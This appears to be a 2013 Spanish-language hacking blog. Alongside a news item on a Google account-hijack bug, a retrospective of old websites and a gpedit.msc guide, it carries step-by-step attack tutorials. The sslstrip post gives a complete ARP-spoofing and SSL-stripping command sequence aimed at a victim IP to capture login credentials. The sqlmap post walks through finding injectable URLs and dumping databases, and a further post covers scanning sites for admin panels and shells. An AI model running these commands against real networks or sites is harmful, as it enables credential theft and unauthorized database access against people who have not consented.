Anuncios

miércoles, 27 de noviembre de 2013

Hackean Google Mail y Obtienen $ 5 100 dolares


Oren Hafif, un investigador de seguridad ha descubierto una vulnerabilidad crítica en el proceso de restablecimiento de la contraseña de la cuenta de Google que permite a un atacante secuestrar cualquier cuenta.

Se las arregló para engañar a los usuarios de Google para que entreguen sus contraseñas a través de un ataque de phishing de lanza sencilla mediante el aprovechamiento de una serie de fallos, es decir, Cross-site request forgery (CSRF), y cross-site scripting (XSS), y un desvío de flujo.

En una prueba de concepto demostración en video, el atacante envía a su víctima una falsa "Confirmar propiedad de la cuenta" de correo electrónico, que dice provenir de Google.

La mención de enlace en el correo indica al destinatario para confirmar la titularidad de la cuenta e instó usuario cambiar su contraseña.
El enlace desde el correo electrónico aparentemente apunta a una URL HTTPS google.com, pero en realidad lleva a la víctima a la página web del atacante debido a un ataque CSRF con una dirección de correo electrónico personalizado.

La página de Google HTTPS se pedirá a la víctima para confirmar la propiedad mediante la introducción de su última contraseña y luego le pedirá para restablecer tu contraseña.
Pero en realidad el hacker ha robado la contraseña y el correo.

Hafif informó a los ingenieros de Google Security con los detalles de esta vulnerabilidad de seguridad seria y Google ahora se ha ocupado de las cuestiones de parcheo. Google ha premiado el Sr. Hafif con 5.100 dólares bajo su Programa de Recompensas por Bug.

jueves, 14 de noviembre de 2013

Erase una vez.. ¿Cómo se veían los sitios más usados del momento hace algunos años?

En el mundo de la informática la tecnología avanza de manera extrema, o por lo menos lo ha hecho recientemente, hoy recopilé algunas imágenes de como se veían algunos de los sitios web más usados hace algunos años, no son demasiados pero repito que en el mundo de la informática basta con unos meses para lanzar a la venta otra versión mejorada de lo que tienes, empecemos.

1.- Google
El primer sitio web que te mostraré hoy es el clásico "Google", desde sus primeras fases podemos observar la implementación del botón "I'm feeling lucky" ó "Voy a tener suerte", sin duda hoy en día es uno de los buscadores más usados por la gente, sin embargo existen otros parecidos.
2.- Youtube
El siguiente sitio corresponde a youtube, hoy uno de los servidores de video más usados por los usuarios, claro aquí vemos la pagina cuando aún no era comprada o asociada con google.
3.- Facebook
En nuestro tercer lugar queda la famosa red social "Facebook" en su origen titulada The Facebook esta foto da lugar al 2004 pero no fue hasta poco tiempo después cuando comenzó a salir a la luz
4.- Yahoo
El numero cuatro se titula Yahoo uno de los buscadores que se usó hace algún tiempo, aún lo usan muchas personas, pero su esplendor ha sido reducido por google.



Y tú ¿Qué opinas?
Si te agrada este artículo crearé una segunda parte, recuerda comentar y agradecer no te cuesta nada (:
fuente: www.chistesparadg.com.ar

lunes, 11 de noviembre de 2013

[Tutorial] Sensitive Buster: Escanear un sitio web para encontrar (Admin panel, backups, archivos y directorios)

Hola :3
Navegando en el internet me encontré con esta herramienta y quise compartirla contigo,

Información
Lo que caracteriza a esta herramienta es escanear determinado Sitio Web y encontrar desde paneles de administración hasta backups del sitio, esta desarrollado en el lenguaje Python así que puedes usar tanto Windows, como Linux o incluso Mac, yo usaré ubuntu 13.10 pero tu puedes usar el sistema operativo que prefieras.
Dicha herramienta lleva por nombre "Sensitive Buster", la herramienta es de código abierto por lo que puedes editarlo para adaptarlo a tus necesidades.

¿Cómo Usarlo?
Sensitive Buster es de lo más sencillo de manejar, se divide en 5 módulos (admin, backup, dir, files, shell), empecemos.

Paso 1
Descargar Sensitive Buster y descomprimirlo

Paso 2
Abrir una nueva terminal y dirigirnos al directorio donde se descomprimió, en mi caso lo descomprimí en:
windows:
cd C:/Sensitive_Buster/
linux:
cd Documentos/Sensitive_Buster

Paso 3
La sintaxis del comando es python sensitivebuster.py "<VICTIMA>" -m <MODULO>, de esta manera.
Mi objetivo sera hacia mi misma PC
~# python sensitivebuster.py "http://localhost/" -m shell
Comenzará a escanear la web y arrojará algo parecido a esto:
Cuando termine el proceso se guardaran los resultados en un archivo similar a http:localhost.txt en la carpeta raíz.

Paso 4
Así cuando finalmente termine podrás iniciar búsqueda con otros de los módulos ya mencionados, ¡Y eso es todo!
Espero le puedas dar un uso con provecho, repito "El conocimiento es libre".


Descarga de los materiales
Sensitive Buster (Descargar)
Ubuntu [Linux] (Descargar)
Python [No es necesario descargarlo en linux] (Descargar)

martes, 29 de octubre de 2013

Sslstrip: Tutorial en español (Espiando tráfico http) desde Ubuntu linux

¡ Hola !
El día de hoy te mostraré como espiar tráfico http para obtener datos Post y Get desde distribuciones de linux, yo usaré ubuntu, pero tú puedes usar la que prefieras.

Antes que nada quiero aclarar que este tutorial lo hago con fines educativos "El conocimiento es libre" cada quien se hace responsable del uso que le de.

Materiales que utilizaremos
Sslstrip (Descargar)
Fping (sudo apt-get install fping)
Python [Linux lo incluye por defecto](Descargar)

¿Qué es y Cómo funciona?



HTTP
Todos los datos que tú envías y recibes a través de un navegador web tales como mensajes, formularios o inicio de sesiones se comunican por medio del protocolo http (Hypertext Transfer Protocol) se basa en la arquitectura de Cliente - Servidor esto quiere decir que funciona con Peticiones - Respuestas.


Ejemplo: cuando tú quieres entrar a facebook.com a través de un cliente web estas haciendo una petición al servidor web de facebook y te responde con un html que se traduce al diseño de la pagina que ves en tu navegador.

SSL
Secure Sockets Layer, algo que se traduce en Capa de Conexión segura ahora "TLS", ssl proporciona autentificación y privacidad, encriptando la información que se envía por medio del protocolo http tales como mensajes, usuarios y contraseñas.
Ejemplo: cuando el tráfico de una pagina esta viajando de forma segura se puede apreciar al inicio de la url "https://facebook.com" por lo contrario la información no segura "http://paginaweb.com".

Recapitulando
Convierte todo el tráfico https en http sin cifrar y lo captura para luego mostrarnos las peticiones que se realizaron, se puede apreciar este cambio por el prefijo "https" que se sustituye por "http" la desventaja de esto es que solo funciona en una red local.


Iniciemos el tutorial

Como te mencioné anteriormente yo usare la nueva versión de Ubuntu 13.10, tú puedes usar la que prefieras o se adapte mejor a tus necesidades.

Antes que nada, necesitamos las direcciones IP's de la victima, y de el Servidor.
¿Cómo conseguimos la dirección ip?
Bueno el primer paso es saber como está "estructurada" nuestra red, para eso:
ifconfig

Nuestra ip es "192.168.1.64" en este caso pero, ¿Y las demás computadoras?
Para esto existe un comando llamado fping:

Ejecutamos en la terminal:
sudo apt-get install fping
Y después escaneamos los hosts guardándolos en un archivo
"fping -a -g <ipInicial> <IpFinal> > hosts" Ejemplo:
fping -a -g 192.168.1.1 192.168.1.254 > hosts
Para finalmente leer la lista de hosts:
cat hosts




Usaremos 3 terminales para ingresar los siguientes comandos:
Terminal 1:
//Accedemos como Root o Super Usuario
sudo -sH

//Activamos IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

//Ejecutamos el comando arpspoof -i <interfaz> -t <VictimaIP> <Servidor>
arpspoof -i wlan0 -t 192.168.1.104 192.168.1.254

Terminal 2:
//Redireccionamos el trafico http del puerto "80" al "8080"
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

//Ejecutamos sslStrip indicandole "-w" que lo guarde en un archivo y "-l" que escuche por el puerto 8080
sslstrip -w cap -l 8080

Terminal 3:
//Finalmente el comando Tail para leer la información

tail -f cap



Finalmente el resultado:

El navegador de la victima muestra que la información no está viajando de forma cifrada, pero sin ninguna advertencia por parte del navegador, el usuario ingresa sus datos normalmente:
Y la información nos llega a la pantalla de captura:
Todo se muestra normal al ingresar a la pagina:
No hace falta nada más, la información nos ha llegado, en ella incluye el tipo de datos (POST/GET) la url (facebook.com) y finalmente los parámetros.
Y eso es todo! muchas gracias por leer este post.

jueves, 24 de octubre de 2013

Administrar Permisos de Windows con Editor de Directivas de Grupo Local - (gpedit.msc)

El Editor de directivas de Grupo Local es una herramienta de windows que permite administrar los permisos del equipo y de los usuarios, en windows 2000 y las versiones posteriores de Windows usan directivas de grupo para aplicar la configuración del registro. La directiva puede ser aplicada localmente a un único equipo usando gpedit.msc, o a varios usuarios y equipos dentro de un dominio usando gpmc.msc.

¿Para qué nos serviría esto?

Tal como mencioné anteriormente nos permite modificar los permisos y funciones de windows entre otras cosas, tales como:
Algo que se puede observar en los cibercafés, como método de seguridad para proteger la aplicación que cuenta el tiempo que llevamos utilizando la pc.

¿Cómo ejecutar o acceder al Editor?

Para acceder al editor:

-Presionamos las teclas:
Home + R
-Windows 7
Damos click en "Inicio", buscamos "ejecutar" y presionamos la tecla Intro.
-Versiones anteriores:
Click en "Inicio" > ejecutar (En la parte inferior derecha)

Una vez abierta la ventana "ejecutar" tecleamos la palabra gpedit.msc y damos enter.
Finalmente nos mostrará una ventana como esta, donde podremos empezar a administrar la directiva de windows y el registro. No estoy seguro pero creo que algunos windows no cuentan con esto, si tienes algún problema, puedes instalarlo aquí.

FIN..?

Les dejo un post donde pueden consultar algunas otras funciones.

miércoles, 23 de octubre de 2013

Tutorial de SQL Injection con Sqlmap (En español)


En el siguiente tutorial aprenderemos como utilizar sqlmap para explotar la vulnerabilidad de un sitio web. Aquí la web del autor, se agradecen infinitamente las donaciones.
Yo usaré Ubuntu 13.10 para este tutorial.


Materiales
Sqlmap
Linux (sqlmap.tar.gz)
Windows (sqlmap.zip)

Python
Descargar


Ubuntu (SO)
Descargar
Instalar
Windows
  1.- Instalar Python
  2.- Abrir el archivo y descomprimirlo en C:/sqlmap/
Linux (terminal)
  1.- Abrir una nueva terminal y dirigirnos a la carpeta donde descomprimiremos sqlmap, yo lo haré en "/var/opt/"
    cd /var/opt
  2.- Descomprimir el archivo, yo lo descargué en "~/Documentos/", nos pedira la contraseña y comenzará a descomprimir
    sudo tar -xzvf ~/Documentos/sqlmap.tar.gz

  ¡Finalmente Sqlmap Se instaló!


Encontrando la Vulnerabilidad
Primero necesitamos una url vulnerable, en su mayoría se parecen a esta "index.php?id=65se puede comprobar añadiendo una comilla simple que provoca un error parecido a este:
Una vez encontrada la vulnerabilidad tenemos que comprobar que es vulnerable:
linux:
  sudo -sH (Importante ejecutar los comandos como root o Super User)
  cd /var/opt/sqlmap
  ./sqlmap.py
Windows:
 cd C:/sqlmap/
 python sqlmap.py

Ejecutamos el comando para listar las bases de datos:
  ./sqlmap.py -u "URL VULNERABLE" --dbs

Si todo sale bien nos mostrará un mensaje como este, diciendo que el parámetro es vulnerable y nos pregunta si queremos seguir testeando otros:
Elegimos que no oprimiendo la tecla "N".

Explotando la vulnerabilidad
Una vez encontrada la vulnerabilidad el programa nos mostrará las bases de datos de el sitio, tales como las siguientes:
Tenemos las siguientes bases de datos:
  available databases [2]:                                                           [*] dbkenwright
    [*] information_schema
¡Hemos entrado a las bases de datos del sistema!


Comandos
Les dejaré los comandos de lo que podemos hacer, de igual manera se pueden consultar con:
./sqlmap.py --help

Comprueba si el parametro es vulnerable y lista las bases de datos del sitio
  ./sqlmap.py -u "urlvulnerable.com/?id=12" --dbs
Lista las tablas del sitio
  ./sqlmap.py -u "urlvulnerable.com/?id=12" -D <DataBase> --tables 
Muestra el contenido de las tablas
  ./sqlmap.py -u "urlvulnerable.com/?id=12" -D <DataBase> -T <table> --dump